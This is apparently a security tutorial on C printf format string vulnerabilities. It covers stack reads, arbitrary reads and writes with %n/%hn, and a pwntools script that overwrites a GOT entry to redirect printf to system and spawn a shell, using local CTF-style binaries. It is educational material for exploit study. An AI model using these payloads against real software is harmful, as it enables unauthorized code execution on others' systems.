# Format Strings

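## Basic Information

In C, **`printf`** is a function that **prints** a string. The **first parameter** it expects is the **raw text containing the formatters**. The **following parameters** are the **values** that **replace** the **formatters** in that text.

The vulnerability appears when **attacker-controlled text is passed as the first argument** to this function. The attacker can craft a **special input that abuses** the **printf format string** capabilities to read and **write any data at any address (readable/writable)**, which can lead to **arbitrary code execution**.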

#### Formatters:
```bash
%08x -> 8 hex digits (one 4-byte word, zero-padded)
%d -> Signed integer
%u -> Unsigned integer
%s -> String
%n -> Writes the number of bytes printed so far
%hn -> Same as %n, but writes only 2 bytes instead of 4
%<n>$x -> Direct access, Example: ("%3$d", var1, var2, var3) -> Access to var3
```
**Examples:**

* Vulnerable example:
```c
char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.
```
* Normal use:
```c
int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
```
* With missing arguments:
```c
printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.
```
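### **Accessing Pointers**

The format **`%<n>$x`**, where `n` is a number, tells printf to select the n-th parameter (from the stack). So, to read the 4th parameter from the stack using printf, you could do: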
```c
printf("%x %x %x %x")
```
and you would read from the first to the fourth parameter.

Or you could do:
```c
printf("%4$x")
```
and read the fourth parameter directly.
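
The difference between sequential and direct access can be illustrated with a toy model. This is only a sketch: `toy_printf` and the `stack` values are hypothetical, nothing here touches real memory, and it handles only `%x` and `%<n>$x`.

```python
import re

def toy_printf(fmt, stack):
    """Toy model of how printf picks arguments for %x and %<n>$x."""
    next_arg = 0  # index of the next sequential argument

    def expand(match):
        nonlocal next_arg
        if match.group(1):                  # "%<n>$x": 1-based direct access
            index = int(match.group(1)) - 1
        else:                               # "%x": consume the next argument
            index = next_arg
            next_arg += 1
        return format(stack[index], "x")

    return re.sub(r"%(?:(\d+)\$)?x", expand, fmt)

# Hypothetical words sitting where printf looks for its arguments.
stack = [0xdeadbeef, 0x41414141, 0x0804a010, 0xcafebabe]

print(toy_printf("%x %x %x %x", stack))  # deadbeef 41414141 804a010 cafebabe
print(toy_printf("%4$x", stack))         # cafebabe
```

Direct access matters in practice because the interesting value is often dozens of words away, and a long chain of `%x` may not fit in the input buffer.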

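Notice that the attacker controls the `printf` **parameter, which basically means that** their input will be on the stack when `printf` is called, so they can place specific memory addresses on the stack.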

{% hint style="danger" %}
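An attacker controlling this input will be able to **add arbitrary addresses to the stack and make `printf` access them**. The next section explains how to use this behaviour.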
{% endhint %}

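## **Arbitrary Read**

The formatter **`%<n>$s`** makes **`printf`** take the **address** located at **position n** and **print the memory it points to as if it were a string** (printing until a 0x00 byte is found). So, if the base address of the binary is **`0x8048000`** and we know that the user input starts at the 4th position on the stack, it's possible to print the start of the binary with: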
```python
from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param: print the string pointed to by the 6th param
payload += b'xxxx' #5th param (padding that fills the input up to 8 bytes)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
```
{% hint style="danger" %}
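Note that you cannot put the address 0x8048000 at the beginning of the input: packed in little-endian it contains a 0x00 byte, so the format string would be cut at that null byte before `printf` reaches the formatter.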
{% endhint %}
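
The layout of that payload can be reproduced without pwntools. The following is a minimal sketch, assuming a 32-bit little-endian target and that the input offset is already known; `build_read_payload` and its parameters are hypothetical names used only for illustration.

```python
import struct

def build_read_payload(address, input_offset, spec_words=2, word_size=4):
    """Return b'%<k>$s' + padding + packed address (32-bit, little-endian).

    input_offset: 1-based printf parameter where our input starts (assumed known).
    spec_words:   stack words reserved for the formatter and its padding.
    """
    index = input_offset + spec_words          # parameter that will hold the address
    spec = b"%%%d$s" % index
    room = spec_words * word_size
    if len(spec) > room:
        raise ValueError("formatter does not fit in the reserved words")
    return spec + b"x" * (room - len(spec)) + struct.pack("<I", address)

payload = build_read_payload(0x8048000, input_offset=4)
print(payload)                 # b'%6$sxxxx\x00\x80\x04\x08'
print(payload.index(b"\x00"))  # 8: the null byte comes after the formatter
```

Placing the packed address last keeps the null byte behind the formatter, which is the point made in the hint above.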

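## **Arbitrary Write**

The formatter **`%<num>$n`** **writes** the **number of bytes written so far** to the **address** held in the \<num> parameter on the stack. If an attacker can make printf output as many characters as they want, they can make **`%<num>$n`** write an arbitrary number to an arbitrary address.

Fortunately, writing the number 9999 does not require adding 9999 "A"s to the input. Instead, the formatter **`%.<num-write>x%<num>$n`** writes the number **`<num-write>`** to the **address pointed to by the `num` position**.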
```bash
AAAA%.6000d%4\$n -> Write 6004 in the address indicated by the 4th param
AAAA.%500\$08x -> Param at offset 500
```
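
The arithmetic behind the first line (4 bytes of prefix plus 6000 padded digits gives 6004) can be sketched as follows. `single_write_format` is a hypothetical helper, not part of any library, and it only builds the string.

```python
def single_write_format(value, param, prefix=b"AAAA"):
    """Format string that makes %<param>$n store `value` after printing `prefix`."""
    pad = value - len(prefix)   # characters still to print before %n
    if pad < 1:
        raise ValueError("value must exceed the prefix length")
    # %.<pad>d prints at least <pad> digits. If the consumed argument is
    # negative, the minus sign adds one extra character to the count.
    return prefix + b"%%.%dd%%%d$n" % (pad, param)

fmt = single_write_format(6004, 4)
print(fmt)  # b'AAAA%.6000d%4$n'
```

The shell examples above escape `$` as `\$`; that escaping is only needed when the string passes through a shell.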
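However, note that to write an address such as `0x08049724` (a HUGE number to write at once), **`%hn`** is usually used instead of `%n`. This **writes only 2 bytes**, so the operation is done twice: once for the highest 2 bytes of the address and once for the lowest 2.

Therefore, this vulnerability allows **writing anything to any address (arbitrary write).**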
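
To see why splitting the write helps, compare how many characters `printf` has to emit in each case. This is a small worked example for the value `0x08049724`; `split_halves` is a hypothetical helper.

```python
def split_halves(value):
    """Return (HOB, LOB): the high and low 16 bits of a 32-bit value."""
    return (value >> 16) & 0xFFFF, value & 0xFFFF

target_value = 0x08049724
hob, lob = split_halves(target_value)

chars_with_n = target_value    # one %n: the counter must reach the full value
chars_with_hn = max(hob, lob)  # two %hn, smaller half first: the counter only reaches the larger half

print(hex(hob), hex(lob))           # 0x804 0x9724
print(chars_with_n, chars_with_hn)  # 134518564 38692
```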

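In this example, the goal is to **overwrite** the **address** of a **function** in the **GOT** table that will be called later, although other arbitrary-write-to-exec techniques could be abused as well: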

{% content-ref url="../arbitrary-write-2-exec/" %}
[arbitrary-write-2-exec](../arbitrary-write-2-exec/)
{% endcontent-ref %}

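We are going to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.\
As mentioned, writing the address usually takes 2 steps: you **first write 2 bytes** of the address and then the other 2. To do so, **`%hn`** is used.

- **HOB** refers to the 2 higher bytes of the address
- **LOB** refers to the 2 lower bytes of the address

Then, because of how format strings work (the count of printed bytes can only grow), you need to **write first the smaller** of \[HOB, LOB] and then the other one.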

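If HOB < LOB\
`[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]\$hn`

If HOB > LOB\
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]\$hn`

For the HOB < LOB case, the fields are, in order: the address that receives the HOB, the address that receives the LOB, `HOB - 8` (padding), the parameter number of the HOB address, `LOB - HOB` (padding), and the parameter number of the LOB address. The 8 that is subtracted accounts for the 8 bytes already printed by the two addresses.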

{% code overflow="wrap" %}
```bash
python3 -c 'import sys; sys.stdout.buffer.write(b"\x26\x97\x04\x08" + b"\x24\x97\x04\x08" + b"%.49143x" + b"%4$hn" + b"%.15408x" + b"%5$hn" + b"\n")'
```
{% endcode %}
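
The two templates can be turned into a small builder. The following is a sketch under stated assumptions: a 32-bit little-endian target and a known offset. `hn_payload` is a hypothetical helper, and the value `0xbffffc2f` is not stated in the text; it is inferred from the paddings in the one-liner above (8 + 49143 = 0xbfff, then + 15408 = 0xfc2f).

```python
import struct

def hn_payload(address, value, offset):
    """Two-%hn payload for a 32-bit little-endian target.

    offset: 1-based printf parameter where the payload starts (assumed known).
    Layout: [address+2][address], then two padded %hn writes, smaller half first.
    """
    hob, lob = (value >> 16) & 0xFFFF, value & 0xFFFF
    header = struct.pack("<II", address + 2, address)  # parameters offset and offset+1
    # Pairs of (half value, parameter index of the address that receives it).
    (first, first_param), (second, second_param) = sorted(
        [(hob, offset), (lob, offset + 1)]
    )
    pad1, pad2 = first - len(header), second - first
    # %.Nx prints at least N digits, so a pad below 8 may print more than requested.
    if pad1 < 8 or pad2 < 8:
        raise ValueError("padding too small for this simple sketch")
    return header + b"%%.%dx%%%d$hn%%.%dx%%%d$hn" % (
        pad1, first_param, pad2, second_param
    )

print(hn_payload(0x08049724, 0xBFFFFC2F, 4))
```

With these inputs the builder returns the same bytes as the one-liner above. Sorting the two halves covers both the HOB < LOB and the HOB > LOB template.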

### Pwntools Template

You can find a template to prepare an exploit for this kind of vulnerability in:

{% content-ref url="format-strings-template.md" %}
[format-strings-template.md](format-strings-template.md)
{% endcontent-ref %}

Or this basic example from [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite):
```python
from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
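libc.address = 0xf7dc2000       # libc base; fixed only because ASLR is disabled

p = process()

# Offset 5: our input starts at the 5th printf parameter.
# Overwrite the GOT entry of printf with the address of system.
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

# If the program calls printf on our next input, it now runs system(input).
p.sendline(b'/bin/sh')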

p.interactive()
```
## Other Examples & References

* [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
* [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
* [https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html)
  * 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
* [https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html)
  * 32 bit, relro, no canary, nx, no pie, format string to overwrite the address of `fflush` with the win function (ret2win)
* [https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/tw16\_greeting/index.html)
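  * 32 bit, relro, no canary, nx, no pie, format string to write an address inside main into `.fini_array` (so the flow loops back one more time) and to write the address of `system` into the GOT entry of `strlen`. When the flow returns to main, `strlen` is called with user input and, since it now points to `system`, it executes the passed commands.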